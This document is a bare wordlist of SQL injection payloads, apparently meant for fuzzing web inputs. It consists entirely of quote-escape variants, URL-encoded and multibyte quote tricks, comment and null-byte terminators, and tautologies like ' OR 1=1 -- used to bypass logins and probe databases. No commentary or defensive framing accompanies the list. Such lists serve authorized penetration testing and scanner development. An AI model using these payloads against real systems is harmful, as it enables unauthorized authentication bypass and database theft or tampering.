'-- -
'
%2527
%df%27
\'
-- -
'%23
\'%23
'%16
')%16
';%00
')-- -
')%23
')) -- -
\')-- - 
\')-- -
%2527)-- -
%df%27)-- -
%2527))-- -
%df%27))-- -
' OR 1=1 --%0b
' or ''='' --%0b
' oR '1'='1' %23
' oR 1=2 --%0b
' AND 1=1 --%0b
' And 1=2 --%0b
' ANd 1=2 %23
\' OR 1=1 %23
\' OR 1=1 -- -
%2527 OR 1=1 -- -
%df%27 OR 1=1 -- -
%2527) OR 1=1 -- -
%df%27) OR 1=1 -- -
' or 1=1 ;%00
' or 1=1 %00
' or 1=1 %16
'AND 1=1 %16
') AND 1=1 ;%00
') AND 1=1 %16
'AND 1=1 ;%00
' AND 1=1 %00
' or ''=''--
' or 1=1--
' || 1=1 --%0b
' %26%26 1=1 --%0b
'or 1=1--
'or''='
'or'='or'
or ''=''--
or 1=1 --
or 1=1
or 1 LIKE 1--
or''='
or'='or'
'='
 ANd 1=1 --
'ANd 1=1 --
'ANd '1'='1'--
'ANd '1' LIKE '1'--
 ANd 1 LIKE 1 --
 And 1=1 
' or 1=2 --
or 1=2 --
 anD 1=2 --
' or 1=1 %23
' ANd 1=1 %23
') AND 1=1 -- -
')) AND 1=1 -- -
') AND 1=1 AND ('1
')) AND 1=1 AND (('1
) ANd 1=1 (1=1
) AND(1=1) (1
) AND (1
)) AND(1=1) ((1=1
))AND(1)((1
'ANd 1=2 --
' or 232=232--
' ANd 234=234--
"or "a"="a
')or('a'='a
a'or' 1=1--
"or 1=1--
'or'a'='a
"or"="a'='a
1 or '1'='1'=1
1 or '1'='1' or 1=1
'OR 1=1%00
"or 1=1%00
'xor
